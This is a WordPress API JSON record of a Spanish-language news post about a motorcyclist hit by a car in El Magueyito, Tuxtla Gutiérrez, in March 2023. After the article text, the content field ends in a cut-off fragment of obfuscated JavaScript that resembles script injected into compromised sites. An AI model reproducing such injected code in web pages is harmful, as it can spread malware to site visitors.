{"id":8974,"date":"2023-03-08T02:28:26","date_gmt":"2023-03-08T02:28:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8974"},"modified":"2023-03-08T02:28:26","modified_gmt":"2023-03-08T02:28:26","slug":"embisten-a-motociclista-en-el-magueyito","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8974","title":{"rendered":"Embisten a motociclista en El Magueyito"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678242427531.jpg\" alt=\"\" class=\"wp-image-8975\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678242427531.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1678242427531-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 7 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Este martes por la ma\u00f1ana fue atropellado un motociclista cuando circulaba en el Barrio Magueyito de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, el conductor de una YBR de color azul y un veh\u00edculo Kia R\u00edo colisionaron a la altura de la 11 Poniente y Primera Sur.<\/p>\n\n\n\n<p>Testigos relataron que, la moto iba en el sentido de Poniente a Oriente y al cruzar el bulevar con preferencia fue impactado.<\/p>\n\n\n\n<p>El conductor del veh\u00edculo al parecer no se percat\u00f3 del sem\u00e1foro y se pas\u00f3 la preferencia.<\/p>\n\n\n\n<p>Por el golpe el motociclista sali\u00f3 volando y se estrell\u00f3 contra el pavimento resultando con diferentes lesiones.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja para atender al herido pero no fue trasladado a un nosocomio.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo econ\u00f3mico y posteriormente se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 7 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Este martes por la ma\u00f1ana fue atropellado un motociclista cuando circulaba en el Barrio Magueyito de Tuxtla Guti\u00e9rrez. Los reportes de tr\u00e1nsito informaron que, el conductor de una YBR de color azul y un veh\u00edculo Kia R\u00edo colisionaron a la altura de la 11 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8975,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8974","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8974","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8974"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8974\/revisions"}],"predecessor-version":[{"id":8976,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8974\/revisions\/8976"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8975"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8974"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}